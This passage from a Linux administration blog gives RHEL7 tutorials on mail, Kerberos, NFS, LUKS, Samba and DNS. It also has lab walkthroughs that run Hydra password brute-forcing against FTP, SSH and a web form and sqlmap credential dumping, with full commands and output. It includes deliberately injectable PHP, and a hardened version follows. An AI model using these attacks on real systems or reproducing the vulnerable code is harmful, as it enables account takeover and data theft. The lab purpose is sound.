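    printf '%s\n' "$1" | ehlo_has STARTTLS || return 1         # encryption must be on offer
    printf '%s\n' "$2" | ehlo_has AUTH                         # and AUTH available once encrypted
}

# Live probes for the real gateway (not run here): the first talks plain
# SMTP, the second lets openssl negotiate STARTTLS and then re-issues EHLO.
probe_plain() { printf 'EHLO probe.mycompany.com\r\nQUIT\r\n' | nc -w 5 "$HOST" 25; }
probe_tls()   { printf 'EHLO probe.mycompany.com\r\nQUIT\r\n' | openssl s_client -quiet -starttls smtp -connect "$HOST:25" 2>/dev/null; }
probe_gateway() { gateway_policy_ok "$(probe_plain)" "$(probe_tls)"; }

# Constructed replies in the shape Postfix produces with the post's settings.
REPLY_PLAIN='250-meru.mycompany.com
250-PIPELINING
250-SIZE 10240000
250-STARTTLS
250-ENHANCEDSTATUSCODES
250-8BITMIME
250 DSN'
REPLY_TLS='250-meru.mycompany.com
250-PIPELINING
250-SIZE 10240000
250-AUTH PLAIN LOGIN
250-AUTH=PLAIN LOGIN
250-ENHANCEDSTATUSCODES
250-8BITMIME
250 DSN'
```

With 'smtpd_tls_auth_only = no' the cleartext reply would look like REPLY_TLS, and gateway_policy_ok rejects that pairing.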



Wednesday 22 April 2015

POP, IMAP using Dovecot in RHEL7

POP and IMAP are 2 protocols to retrieve mail from a mail server.

POP is best for users who have one system on which to read email. Email clients generally delete messages from the server, after downloading. However, this setting can be changed. Also, the entire content of each message is downloaded.

IMAP is best for users who access their email using multiple machines. Email messages remain on the server, where users can read or delete them. IMAP also allows client apps to create mail dir(s) on the server. Also, only email header information is downloaded for messages, until opened.

Follow the following steps:

1) Install packages
     yum -y install dovecot
     yum -y install mutt

2) Edit the file '/etc/dovecot/dovecot.conf' and make the following changes.
     protocols = imap pop3 

3) Edit the file '/etc/dovecot/conf.d/10-mail.conf' and make the following changes.
     mail_location = mbox:~/mail:INBOX=/var/mail/%u

4) Edit the file '/etc/dovecot/conf.d/10-auth.conf' and make the following changes.
     auth_mechanisms = plain login

5) Change permission for mail spool file.
     cd /var/spool/mail
     chmod 600 *

6) Create new Dovecot self-signed certificate (Optional)  
    6.1)Edit the file '/etc/pki/dovecot/dovecot-openssl.cnf' and enter server hostname and other details.

    6.2)Delete default certificate and private key
           rm /etc/pki/dovecot/private/dovecot.pem
           rm /etc/pki/dovecot/certs/dovecot.pem


    6.3)Run the following script to generate new certificate.
           /usr/libexec/dovecot/mkcert.sh

    6.4)Edit in file '/etc/dovecot/conf.d/10-ssl.conf'
           ssl_cert = </etc/pki/dovecot/certs/dovecot.pem
           ssl_key = </etc/pki/dovecot/private/dovecot.pem


7) Verify parameters changed in config files.
        doveconf  -n 

8) Start the service.
      systemctl start dovecot     
      systemctl enable dovecot

9) Open firewall ports (POP3 110/tcp, IMAP 143/tcp, POP3S 995/tcp, IMAPS 993/tcp).
      firewall-cmd --zone=public --add-service=pop3s --permanent
      firewall-cmd --zone=public --add-service=imaps --permanent
      firewall-cmd --zone=public --add-port=110/tcp --permanent
      firewall-cmd --zone=public --add-port=143/tcp --permanent

10) Check the connection
      mutt -f pops://meru.mycompany.com

Tuesday 21 April 2015

Postfix Server for a domain in RHEL7/CentOS7

In this tutorial, we will configure an email server (gateway) for the domain 'mycompany.com'. This central email gateway will receive all mail for the domain and send all mail originating from the internal network. In other words, it will act as a single entry/exit point for all incoming and outgoing mail.

Client machines in the network will relay outgoing mail through the mail gateway, and can read incoming mail from the mail gateway using POP or IMAP.

NOTE:
- Ensure that DNS Server is configured for the network.
- Ensure MX record entry for the domain is made in the DNS Server zone file.
- Ensure reverse dns entry for the mail server is made in the DNS Server zone file. (Not necessary for this tutorial)
- To check for errors, view the log file '/var/log/maillog'

This tutorial is based on the following configuration:
- Domain Name: mycompany.com
- Email Gateway Name: meru.mycompany.com
- Email Gateway IP address: 192.168.122.1
- Network served by the mail gateway: 192.168.122.0/24

Postfix Incoming/Outgoing Server (Gateway) Configuration: This server will receive incoming mail for the domain and relay outgoing mail from client machines.

1) Edit the file '/etc/postfix/main.cf'. Make the following changes

    myhostname = meru.mycompany.com
    mydomain = mycompany.com


    #the default domain name to append if @domain is missing
    myorigin = $mydomain

    # the network interface addresses on which to receive incoming mail.
    inet_interfaces = all
    # remember to comment this line
   #inet_interfaces = localhost

    #the domains for which this machine is the final destination.
    mydestination = $myhostname, localhost.$mydomain, localhost, $mydomain


   #Trusted SMTP clients - can relay mail through this server.  
    mynetworks = 192.168.122.0/24, 127.0.0.0/8

2) To view the parameters changed run the following command.
     postconf -n

3) To check for syntax errors, run the following command.
     postfix check

4) Open firewall port 25/TCP.
    firewall-cmd --zone=public --add-service=smtp --permanent
    firewall-cmd --reload

5) Restart postfix service
    systemctl restart postfix


Postfix Client Configuration (Submission-only mode): These machines will not receive mail over the network, and will relay outgoing mail through the Postfix Server configured above.

1) Edit the file '/etc/postfix/main.cf'. Make the following changes

    myhostname = meru.mycompany.com
    mydomain = mycompany.com

    #the default domain name to append if @domain is missing
    myorigin = $myhostname

    # the network interface addresses on which to receive incoming mail.
    inet_interfaces = localhost


    #the domains for which this machine is the final destination.
    mydestination = localhost

    #the mail gateway to send mail to.(The server configured above)
     relayhost = [192.168.122.1]     

2) To view the parameters changed run the following command.
     postconf -n

3) To check for syntax errors, run the following command.
     postfix check

4) Open firewall port 25/TCP.
    firewall-cmd --zone=public --add-service=smtp --permanent
    firewall-cmd --reload

5) Restart postfix service
    systemctl restart postfix

Postfix Server for a Stand-alone host in RHEL7

In this tutorial, we configure Postfix Email Server for a stand-alone host, which can send and receive mail.

NOTE:
- Ensure that DNS Server is configured for the network.
- To check for errors, view the log file '/var/log/maillog'

1) Edit the file '/etc/postfix/main.cf'. Make the following changes

    #the hostname of the machine
    myhostname = meru.mycompany.com
 

    # the domain name
    mydomain = mycompany.com  

    #the default domain name to append if @domain is missing
    myorigin = $myhostname

    # the network interface addresses on which to receive incoming mail.
    inet_interfaces = all

    # remember to comment this line
    #inet_interfaces = localhost

    #the domains for which this machine is the final destination.
    mydestination = $myhostname, localhost.$mydomain, localhost

2) To view the parameters changed run the following command.
     postconf -n

3) To check for syntax errors, run the following command.
     postfix check

4) Open firewall port 25/TCP.
    firewall-cmd --zone=public --add-service=smtp --permanent
    firewall-cmd --reload

5) Restart postfix service
    systemctl restart postfix

Monday 20 April 2015

Kerberized NFS in RHEL7/CentOS7

The problem with NFS is that it does not have host-based authentication, so NFS is vulnerable to man-in-the-middle attacks. By using Kerberos, hosts are required to prove their identity before mounting, instead of blindly assuming that the IP they are connecting to is genuine.

For Kerberos Server configuration, refer to this post.

NOTE:
1) Ensure that DNS Server or '/etc/hosts' file is configured for the network.
2) Ensure that Time Synchronization is configured on all machines in the network.
3) All commands are to be executed as 'root' user.

Consider the following scenario:

Kerberos Realm: MYCOMPANY.COM
DNS Domain Name: mycompany.com
Kerberos KDC: meru.mycompany.com
Kerberos Admin Server: meru.mycompany.com

NFS Server: server3.mycompany.com
NFS Client: server1.mycompany.com


Configure NFS Server (server3.mycompany.com):

1) Install packages.
[root@server3 ~]# yum -y install krb5-workstation krb5-libs

2) Edit the file '/etc/krb5.conf'. Make the following changes.
     
       default_realm = MYCOMPANY.COM
       [realms]
       MYCOMPANY.COM = {
       kdc = meru.mycompany.com
       admin_server = meru.mycompany.com
       }

       [domain_realm]
       .mycompany.com = MYCOMPANY.COM
       mycompany.com = MYCOMPANY.COM



   
3) Create nfs principal in the kerberos database and extract keys for the nfs server.
[root@server3 ~]# kadmin -p shabbir/admin -w shabbir
          kadmin:  addprinc -randkey nfs/server3.mycompany.com

          kadmin:  ktadd nfs/server3.mycompany.com
          kadmin:  quit

4) View Keytab entry.
[root@server3 ~]# klist -k

5) Edit the file '/etc/exports' and enable kerberos authentication.
       /home/shabbir   server1.mycompany.com(rw,sec=krb5)


6) Export the directory.
[root@server3 ~]# exportfs -avr

7) Start NFS Secure Server and make sure firewall port is open.
[root@server3 ~]# systemctl start nfs-secure-server

[root@server3 ~]# firewall-cmd --zone=public --add-service=nfs --permanent 
[root@server3 ~]# firewall-cmd --reload


Configure NFS Client (server1.mycompany.com):

1) Install packages.
[root@server1 ~]# yum -y install krb5-workstation krb5-libs

2) Edit the file '/etc/krb5.conf'. Make the following changes.
     
       default_realm = MYCOMPANY.COM
       [realms]
       MYCOMPANY.COM = {
       kdc = meru.mycompany.com
       admin_server = meru.mycompany.com
       }

       [domain_realm]
       .mycompany.com = MYCOMPANY.COM
       mycompany.com = MYCOMPANY.COM



3) Create nfs principal in the kerberos database and extract keys for the nfs client.
[root@server1 ~]# kadmin -p shabbir/admin -w shabbir
          kadmin:  addprinc -randkey nfs/server1.mycompany.com

          kadmin:  ktadd nfs/server1.mycompany.com
          kadmin:  quit

4) View Keytab entry.
[root@server1 ~]# klist -k

5) Start NFS Secure Service.
[root@server1 ~]# systemctl start nfs-secure


6) Mount the exported dir.
[root@server1 ~]# mount -t nfs4  -o sec=krb5  server3.mycompany.com:/home/shabbir  /mnt

7) Log in as user 'shabbir' and obtain a ticket. We assume that a user principal for 'shabbir' exists in the Kerberos database.
[root@server1 ~]# su - shabbir
[shabbir@server1 ~]$ kinit shabbir
Password for shabbir@MYCOMPANY.COM:

8) View the ticket
[shabbir@server1 ~]$ klist
Ticket cache: KEYRING:persistent:0:0
Default principal: shabbir@MYCOMPANY.COM

Valid starting       Expires              Service principal
06/06/2015 15:16:28  06/07/2015 15:16:28  krbtgt/MYCOMPANY.COM@MYCOMPANY.COM
    renew until 06/06/2015 15:16:28


9) Access the mounted dir.
[shabbir@server1 ~]$ cd /mnt
[shabbir@server1 ~]$ touch foo123

10) Destroy the ticket.
[shabbir@server1 ~]$ kdestroy


Disk Encryption using LUKS in RHEL7/CentOS7

NOTE: All commands are to be executed as 'root' user.

Consider disk '/dev/sdb'

1) Ensure dm_crypt module is loaded.
       lsmod | grep dm_crypt
        dm_crypt               23138  0
        dm_mod                102999  19 dm_log,dm_mirror,dm_crypt

    Else load the module
       modprobe dm_crypt

2) Install the package
       yum -y install cryptsetup

3) Create partition '/dev/sdb1' using 'fdisk' or 'parted'.

4) Initialize a LUKS partition and set passphrase
       cryptsetup luksFormat /dev/sdb1

5) Open the LUKS device and  map to 'data'.
       cryptsetup luksOpen /dev/sdb1 data
     The device can now be accessed as '/dev/mapper/data'

6) Create a filesystem on the mapped device.
       mkfs -t xfs /dev/mapper/data

7) Create mount point.
       mkdir -p /var/pub
      
8) Mount the mapped device.
       mount /dev/mapper/data  /var/pub

9) To mount the device automatically at boot time:
     9.1) Create an entry in '/etc/crypttab'
              data     /dev/sdb1
          OR
              data     UUID=09e60914-5cf6-4290-a465-2851053d19a2

     9.2) Create an entry in '/etc/fstab'
              /dev/mapper/data    /var/pub    xfs     defaults     1 2
          OR
              UUID=a0c5c5dc-fecb-4f97-9ecc-0ad371d78cbe    /var/pub    xfs     defaults     0 0

     NOTE: 1) The passphrase has to be entered during the boot process.
           2) To view the UUID of '/dev/sdb1'
                  blkid /dev/sdb1
              or
                  cryptsetup luksUUID /dev/sdb1
           3) To view the UUID of '/dev/mapper/data'
                  blkid /dev/mapper/data

Friday 17 April 2015

Attacking FTP and SSH using Hydra in Kali Linux


In this tutorial, we will launch an automated password guessing attack against an FTP Server and an SSH Server.

We will use 'hydra' in Kali Linux for the attack. We will provide 'hydra' with a wordlist of potential passwords. 'hydra' will try to authenticate using username 'shabbir' and the words in the wordlist as passwords.

1) Attacking FTP Server

root@kali:~# hydra -l shabbir -P /usr/share/wordlists/fasttrack.txt  ftp://192.168.122.1
Hydra v7.6 (c)2013 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2015-04-17 19:58:04
[DATA] 16 tasks, 1 server, 133 login tries (l:1/p:133), ~8 tries per task
[DATA] attacking service ftp on port 21
[21][ftp] host: 192.168.122.1   login: shabbir   password: admin
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2015-04-17 19:58:08

where
  -l shabbir                            : 'shabbir' is the login name
  -P /usr/share/wordlists/fasttrack.txt : the wordlist
  ftp://192.168.122.1                   : the server being attacked

2) Attacking SSH Server

root@kali:~# hydra -l shabbir -P /usr/share/wordlists/fasttrack.txt  192.168.122.1 ssh -s 22
Hydra v7.6 (c)2013 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2015-04-17 20:02:18
[DATA] 16 tasks, 1 server, 133 login tries (l:1/p:133), ~8 tries per task
[DATA] attacking service ssh on port 22
[22][ssh] host: 192.168.122.1   login: shabbir   password: admin
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2015-04-17 20:02:22

where
  -l shabbir                            : 'shabbir' is the login name
  -P /usr/share/wordlists/fasttrack.txt : the wordlist
  192.168.122.1                         : the server being attacked

SQL Injection Attack using sqlmap in Kali Linux


In this tutorial, we develop a sample web application and launch an SQL Injection attack against it, to grab the usernames and passwords from the database.

The Web application and the database table are given below:

1) The login page 'cust_login.html'

cust_login.html
<html>
<body>
 <form method="get" action="cust_display.php">
   <label for="name">User Name:</label>
   <input type="text" id="name" name="name" /><br />

   <input type="submit" value="login" name="submit" />
 </form>
</body>
</html>


2) The page 'cust_display.php' displays the customer details


cust_display.php
<html>
<body>
<?php
$name = $_GET["name"];

$conn = new mysqli("localhost","root","root","hacking");
if ($conn->connect_error){
    die("Connection failed:  " . $conn->connect_error);
}

$sql = "select name,firstname,surname,address from customer where name = '" . $name . "'";
$result = $conn->query($sql);

$row= $result->fetch_assoc();
echo "firstname: " . $row["firstname"]. "<br>";
echo "surname: "   . $row["surname"].   "<br>";
echo "address: "   . $row["address"].     "<br>";

$conn->close();
?>
</body>
</html>


3) The MySQL database table Customer

 MariaDB [hacking]> desc customer;
+-----------+--------------+------+-----+---------+-------+
| Field     | Type         | Null | Key | Default | Extra |
+-----------+--------------+------+-----+---------+-------+
| name      | varchar(50)  | NO   | PRI | NULL    |       |
| passwd    | varchar(50)  | YES  |     | NULL    |       |
| firstname | varchar(50)  | YES  |     | NULL    |       |
| surname   | varchar(50)  | YES  |     | NULL    |       |
| address   | varchar(200) | YES  |     | NULL    |       |
+-----------+--------------+------+-----+---------+-------+


4) Launching SQL Injection attack against the web application

4.1) Fetch list of available databases
 root@kali:~# sqlmap -u http://www.mycompany.com/cust_display.php?name=shabbir --dbs

available databases [6]:
[*] hacking
[*] information_schema
[*] mybank
[*] mysql
[*] performance_schema
[*] test

4.2) Fetch list of tables in database 'hacking'
root@kali:~# sqlmap -u http://www.mycompany.com/cust_display.php?name=shabbir -D hacking --tables

Database: hacking
[1 table]
+----------+
| customer |
+----------+


4.3) Fetch list of columns in table 'customer'
root@kali:~# sqlmap -u http://www.mycompany.com/cust_display.php?name=shabbir -D hacking -T customer --columns

Database: hacking
Table: customer
[5 columns]
+-----------+--------------+
| Column    | Type         |
+-----------+--------------+
| address   | varchar(200) |
| firstname | varchar(50)  |
| name      | varchar(50)  |
| passwd    | varchar(50)  |
| surname   | varchar(50)  |
+-----------+--------------+

4.4) Fetch list of 'username,password' from table 'customer'
root@kali:~# sqlmap -u http://www.mycompany.com/cust_display.php?name=shabbir -D hacking -T customer -C name,passwd --dump

Database: hacking
Table: customer
[4 entries]
+---------+--------+
| name    | passwd |
+---------+--------+
| pk      | aunty  |
| priya   | blue   |
| shabbir | admin  |
| taher   | hello  |
+---------+--------+

Thursday 16 April 2015

Hacking Web Login using Hydra in Kali Linux


In this tutorial, we will develop a sample web application and launch an online password attack against it. We will use 'hydra' in Kali Linux for the attack.

Given below is the PHP application and MySQL database table.
The application consists of 2 pages.
1) user_login.html
2) user_verify.php

1) The login page 'user_login.html'


user_login.html
<html>
<body>
 <form method="post" action="user_verify.php">
   <label for="name">User Name:</label>
   <input type="text" id="name" name="name" /><br />

   <label for="passwd">Password:</label>
   <input type="text" id="passwd" name="passwd" /><br />

   <input type="submit" value="login" name="submit" />
 </form>
</body>
</html>


2) The page 'user_verify.php' displays the message below on successful login.

user_verify.php
<html>
<body>
<?php
$name = $_POST['name'];
$passwd = $_POST['passwd'];

$conn = new mysqli("localhost","root","root","hacking");
if ($conn->connect_error){
    die("Connection failed:  " . $conn->connect_error);
}

$sql = "select * from customer where name = '" . $name . "'";
$result = $conn->query($sql);

$row= $result->fetch_assoc();

$pvalue = $row["passwd"];

if(strcmp($passwd,$pvalue) == 0){
        echo "login successful";
}else{
        echo "login error";
}
$conn->close();
?>
</body>
</html>

3) The MySQL database table Customer

 MariaDB [hacking]> desc customer;
+-----------+--------------+------+-----+---------+-------+
| Field     | Type         | Null | Key | Default | Extra |
+-----------+--------------+------+-----+---------+-------+
| name      | varchar(50)  | NO   | PRI | NULL    |       |
| passwd    | varchar(50)  | YES  |     | NULL    |       |
| firstname | varchar(50)  | YES  |     | NULL    |       |
| surname   | varchar(50)  | YES  |     | NULL    |       |
| address   | varchar(200) | YES  |     | NULL    |       |
+-----------+--------------+------+-----+---------+-------+


4) Using hydra to attack the above application. We provide a wordlist of passwords to hydra. If the password matches one of the words in our wordlist, we will successfully login to the application.

root@kali:~# hydra www.mycompany.com http-form-post "/user_verify.php:name=^USER^&passwd=^PASS^:login error"  -l priya -P /usr/share/wordlists/fasttrack.txt -t 10 -w 30 -o hydra_attack.txt

Hydra v7.6 (c)2013 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2015-04-16 23:17:22
[DATA] 10 tasks, 1 server, 133 login tries (l:1/p:133), ~13 tries per task
[DATA] attacking service http-post-form on port 80
[80][www-form] host: 192.168.122.1   login: priya   password: blue
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2015-04-16 23:17:23
root@kali:~#


where
       www.mycompany.com                      :- the website being attacked
       http-form-post                         :- the POST method is used to submit the form
       user_verify.php                        :- password verifying script
       name=^USER^&passwd=^PASS^              :- form parameters
       login error                            :- the message displayed by the script on incorrect login
       -l priya                               :- the login name used to attack the website
       -P /usr/share/wordlists/fasttrack.txt  :- the wordlist used for the attack
       -t 10                                  :- run 10 tasks in parallel
       -w 30                                  :- max amount of time to wait for a response (in sec)
       -o hydra_attack.txt                    :- output file
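The application above and the one in the sqlmap section share two weaknesses: the user-supplied name is concatenated straight into the SQL string, and the password is stored and compared in plaintext. Below is an added hardened version of 'user_verify.php' (example code, not from the original post) that binds the name as a parameter, verifies a password_hash() digest, and throttles an account after repeated failures, so a wordlist run like the one above gets only a handful of guesses per account. It assumes a widened 'passwd' column, a 'login_attempts' table and a low-privilege database user 'webapp' with a placeholder password, none of which are in the original post.

```php
<?php
// Added hardened replacement for the post's user_verify.php (and the query in
// cust_display.php); example code, not the original post's. Assumed, not from
// the post: customer.passwd widened to VARCHAR(255) and holding password_hash()
// output instead of plaintext; a table login_attempts(name VARCHAR(50) PRIMARY
// KEY, failures INT, last_failure DATETIME); low-privilege DB user; PHP >= 5.5.
define('MAX_FAILURES', 5);    // guesses allowed before an account is throttled
define('LOCKOUT_SECS', 900);  // throttle duration after the last failure

function db_connect() {
    $conn = new mysqli("localhost", "webapp", "webapp-password", "hacking");
    if ($conn->connect_error) {
        error_log("DB connection failed: " . $conn->connect_error);
        exit("service unavailable");   // never echo DB errors to the client
    }
    return $conn;
}

// Parameterised version of the cust_display.php query: $name is bound as
// data, so a quote character in it can no longer change the SQL statement.
function fetch_customer($conn, $name) {
    $stmt = $conn->prepare(
        "SELECT name, firstname, surname, address FROM customer WHERE name = ?");
    $stmt->bind_param("s", $name);
    $stmt->execute();
    $stmt->bind_result($n, $first, $sur, $addr);
    $found = $stmt->fetch();
    $stmt->close();
    return $found ? array("name" => $n, "firstname" => $first,
                          "surname" => $sur, "address" => $addr) : null;
}

// True when $name has failed MAX_FAILURES or more times within LOCKOUT_SECS.
function is_locked($conn, $name) {
    $max = MAX_FAILURES; $secs = LOCKOUT_SECS;   // bind_param needs variables
    $stmt = $conn->prepare(
        "SELECT 1 FROM login_attempts WHERE name = ? AND failures >= ?
            AND TIMESTAMPDIFF(SECOND, last_failure, NOW()) < ?");
    $stmt->bind_param("sii", $name, $max, $secs);
    $stmt->execute();
    $stmt->store_result();
    $locked = $stmt->num_rows > 0;
    $stmt->close();
    return $locked;
}

// Bump the failure counter on a bad login, reset it on a good one.
function update_attempts($conn, $name, $ok) {
    $sql = $ok ? "DELETE FROM login_attempts WHERE name = ?"
               : "INSERT INTO login_attempts (name, failures, last_failure) VALUES (?, 1, NOW())
                  ON DUPLICATE KEY UPDATE failures = failures + 1, last_failure = NOW()";
    $stmt = $conn->prepare($sql);
    $stmt->bind_param("s", $name);
    $stmt->execute();
    $stmt->close();
}

// Replaces strcmp() against a plaintext column: the stored value is a
// password_hash() digest and password_verify() compares in constant time.
function verify_login($conn, $name, $passwd) {
    if (is_locked($conn, $name)) {
        return false;              // throttled: do not even consult the hash
    }
    $stmt = $conn->prepare("SELECT passwd FROM customer WHERE name = ?");
    $stmt->bind_param("s", $name);
    $stmt->execute();
    $stmt->bind_result($hash);
    $found = $stmt->fetch();
    $stmt->close();
    $ok = $found && password_verify($passwd, $hash);
    update_attempts($conn, $name, $ok);
    return $ok;
}

$conn = db_connect();
$name   = isset($_POST['name'])   ? $_POST['name']   : '';
$passwd = isset($_POST['passwd']) ? $_POST['passwd'] : '';
echo verify_login($conn, $name, $passwd) ? "login successful" : "login error";
$conn->close();
```

The same generic "login error" is returned for a wrong password, an unknown user and a throttled account, so the response reveals nothing beyond success or failure; fetch_customer() is the parameterised counterpart of the query in 'cust_display.php'.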

Kerberos Configuration in RHEL7/CentOS7

NOTE: 1) Ensure that a DNS Server or the '/etc/hosts' file is configured for the network.
      2) Ensure that Time Synchronization is configured on all machines in the network.

Kerberos Realm: MYCOMPANY.COM
DNS Domain Name: mycompany.com
Kerberos Server: meru.mycompany.com

SSH Server: server1.mycompany.com
SSH Client: server2.mycompany.com

Configure Kerberos Server:


NOTE: All commands are to be executed as 'root' user.

1) Install packages.
[root@meru ~]# yum -y install krb5-server krb5-libs

2) Edit the file '/etc/krb5.conf'. Make the following changes.
     
       default_realm = MYCOMPANY.COM
       [realms]
       MYCOMPANY.COM = {
       kdc = meru.mycompany.com
       admin_server = meru.mycompany.com
       }

       [domain_realm]
       .mycompany.com = MYCOMPANY.COM
       mycompany.com = MYCOMPANY.COM


3) Edit the file '/var/kerberos/krb5kdc/kdc.conf'. Make the following changes.
       [realms]
        MYCOMPANY.COM = {
         #master_key_type = aes256-cts
         acl_file = /var/kerberos/krb5kdc/kadm5.acl
         dict_file = /usr/share/dict/words
         admin_keytab = /var/kerberos/krb5kdc/kadm5.keytab
         supported_enctypes = aes256-cts:normal aes128-cts:normal des3-hmac-sha1:normal arcfour-hmac:normal camellia256-cts:normal camellia128-cts:normal des-hmac-sha1:normal des-cbc-md5:normal des-cbc-crc:normal
       }

4) Open Firewall Ports. KDC - 88(tcp/udp) , kadmind - 749(tcp/udp)
[root@meru ~]# firewall-cmd --zone=public --add-service=kerberos --permanent 
[root@meru ~]# firewall-cmd --zone=public --add-port=749/tcp --permanent 
[root@meru ~]# firewall-cmd --zone=public --add-port=749/udp --permanent 
[root@meru ~]# firewall-cmd --reload

5) Create Kerberos database that stores keys for the kerberos realm.
[root@meru ~]# kdb5_util create -s

6) Edit the file '/var/kerberos/krb5kdc/kadm5.acl'. This file is used by 'kadmind' to determine which principals have admin access to the kerberos database.
       */admin@MYCOMPANY.COM   *


7) Create the first principal.
[root@meru ~]# kadmin.local -q "addprinc shabbir/admin"

8) Start Kerberos Service
[root@meru ~]# systemctl start krb5kdc 
[root@meru ~]# systemctl start kadmin


Configure SSH Server:

1) Install packages.
[root@server1 ~]# yum -y install krb5-workstation krb5-libs

2) Copy the file '/etc/krb5.conf' from the Kerberos Server (meru.mycompany.com).
[root@server1 ~]# scp root@meru.mycompany.com:/etc/krb5.conf  /etc/krb5.conf

3) Create a host principal in the Kerberos database and extract keys for the host.
[root@server1 ~]# kadmin -p shabbir/admin -w shabbir
          kadmin:  addprinc -randkey host/server1.mycompany.com

          kadmin:  ktadd host/server1.mycompany.com
          kadmin:  quit 
 
4) Edit the file '/etc/ssh/sshd_config' and enable Kerberos authentication.
       KerberosAuthentication yes
       KerberosTicketCleanup yes
       GSSAPIAuthentication yes
       GSSAPICleanupCredentials yes

5) Restart 'sshd' and make sure firewall port is open.
[root@server1 ~]# systemctl restart sshd

[root@server1 ~]# firewall-cmd --zone=public --add-service=ssh --permanent 
[root@server1 ~]# firewall-cmd --reload

Configure SSH Client:

1) Install packages
[root@server2 ~]# yum -y install krb5-workstation krb5-libs

2) Create user principal for user 'batul' in the kerberos database.
[root@server2 ~]# kadmin -p shabbir/admin -w shabbir        
          kadmin:  addprinc batul
          kadmin:  quit

3) Copy the file '/etc/krb5.conf' from the Kerberos Server (meru.mycompany.com)
[root@server2 ~]# scp root@meru.mycompany.com:/etc/krb5.conf  /etc/krb5.conf

4) Create user 'batul'
[root@server2 ~]# useradd batul
[root@server2 ~]# passwd batul

5) Log in as user 'batul' and obtain a ticket.
[root@server2 ~]# su - batul

[batul@server2 ~]$ kinit batul

6) View the ticket
[batul@server2 ~]$ klist

7) Log in to the SSH Server. (server1.mycompany.com)
[batul@server2 ~]$ ssh batul@server1.mycompany.com


8) After quitting the ssh session, destroy the ticket.
[batul@server2 ~]$  kdestroy


Wednesday 15 April 2015

Linux & Windows File Sharing Using Samba in RHEL7/CentOS7

This tutorial has the following configuration:
- Samba Server IP Address:    192.168.122.1
- Samba Server Netbios Name: MERUBHAI

- Windows 7 IP Address:         192.168.122.156
- Windows 7 Netbios Name:    SHABBIR-PC

- Windows Workgroup Name: WORKGROUP
- The user account 'shabbir' exists on both linux and windows machines. This account is used for file sharing.


Samba Server Configuration:

NOTE: 1) In the Samba config file '/etc/samba/smb.conf', lines starting with ';' or '#' are comments.
      2) All commands are to be run as 'root' user.
      3) It is recommended to have the same username & password on both the Linux and Windows machines.

1) Install Samba Server
      yum -y install samba samba-client

2) Edit the Samba config file '/etc/samba/smb.conf'. Make the following changes.

      workgroup = WORKGROUP                    /'name of Windows workgroup'
      netbios name = MERUBHAI                  /'name of server'
      interfaces = lo eth0 192.168.122.1/24    /'the network interfaces of the server'
      hosts allow = 127. 192.168.122.          /'hosts which are allowed to access the server'

     NOTE: Remember to uncomment the above lines by removing the leading ';'

3) Check for config errors
       testparm

4) Create user account
       useradd shabbir
      passwd shabbir

5) Create user in Samba database.
       smbpasswd -a shabbir
       
6) Enable SELinux boolean to allow Samba to access the home directory.
       setsebool -P samba_enable_home_dirs on

7) Create the following public share
       [public]
        comment = Files shared by shabbir
        path = /var/pub/files
        public = yes
        writeable = yes
        printable = no


8) Create directory and create files in the dir.
        mkdir -p /var/pub/files
        touch /var/pub/files/foo{1,2,3,4,5}
        chown -R shabbir:shabbir /var/pub/files

9) Set SELinux file context for the shared directory
       chcon -R -t samba_share_t /var/pub/files

10) Open Firewall Ports.( 137/udp, 138/udp, 139/tcp, 445/tcp)
      firewall-cmd --zone=public --add-service=samba --permanent
      firewall-cmd --reload

11) Start Samba Service and enable on boot
       systemctl start smb
       systemctl start nmb

      systemctl enable smb
      systemctl enable nmb     



Windows Client Configuration:

1) Open Network and Sharing Center.
   Turn on Network Discovery and File Sharing for all public networks, OR
   make this network a private network.
   Click on Network.

2) Click on MERUBHAI.

3) Click on public.

NOTE:
1) To view/change the workgroup, right-click on My Computer and select Properties.

2) To view the IP address, type ipconfig in a command prompt.

   To change the IP address, open Network and Sharing Center.
   Click on Change Adapter Settings.
   Click on Local Area Network.
   Click on Properties.
   Select Internet Protocol Version 4. Click Properties. Enter the IP address.
       
      
View Windows Shared Folders in Linux :


1) View Remote Shares
       smbclient -L 192.168.122.156 -U shabbir    /'windows ip and username'
       Enter shabbir's password:
       Domain=[SHABBIR-PC] OS=[Windows 7 Professional 7601 Service Pack 1] Server=[Windows 7 Professional 6.1]

    Sharename       Type      Comment
    ---------       ----      -------
    ADMIN$          Disk      Remote Admin
    C$              Disk      Default share
    IPC$            IPC       Remote IPC
    Users           Disk     

2) Create mount point and mount the remote share
       mkdir -p /mnt
      mount //192.168.122.156/Users  /mnt -o username=shabbir,password=pass

3) View shared folder contents
        ls /mnt

         Default  desktop.ini  Public  shabbir


4) Create entry in '/etc/fstab' to automatically mount at boot time.

       //192.168.122.2/Users           /mnt     cifs      rw,username=shabbir,password=pass      0  0

    Putting the password in '/etc/fstab' is a security risk, as that file is world-readable. Instead, configure a dedicated credentials file which is readable only by 'root'.

       //192.168.122.2/Users           /mnt    cifs      rw,credentials=/etc/smbshabbir       0  0


   Create the file '/etc/smbshabbir'
       username=shabbir
       password=pass

   and make it readable only by 'root':
       chmod 600 /etc/smbshabbir







Caching-Only DNS Server in RHEL7/CentOS7


Recursive caching servers answer local users' queries about sites on the Internet.

A Caching-only DNS server will query other DNS servers and cache the response. Next time when the same query is given, it will provide the response from the cache. This will reduce the number of external queries and improve response time for users.

A Caching-only name server loads the addresses of the servers for the root domain from a startup file and accumulates the rest of its data by caching answers to the queries it resolves.

It is not advisable to configure 'bind' to work as your authoritative server for your own zones and as a caching server for your users. The function of serving your authoritative data to the world should be separated from serving the world's data to your users. 


DNS Server IP Address: 192.168.122.1


1) Install DNS Server
[root@meru ~]# sudo yum -y install bind bind-utils

2) Edit the configuration file '/etc/named.conf' and make the following changes.

           // The network interfaces on which to listen for queries
           listen-on port 53 { 127.0.0.1; 192.168.122.1; };

           // Clients allowed to query the DNS Server
           allow-query     { localhost; 192.168.122.0/24; };

           // All queries are forwarded to this server. The use of a forwarder circumvents the normal DNS procedure of starting at a root server and following a chain of referrals.
           forwarders { 8.8.8.8; 8.8.4.4; };

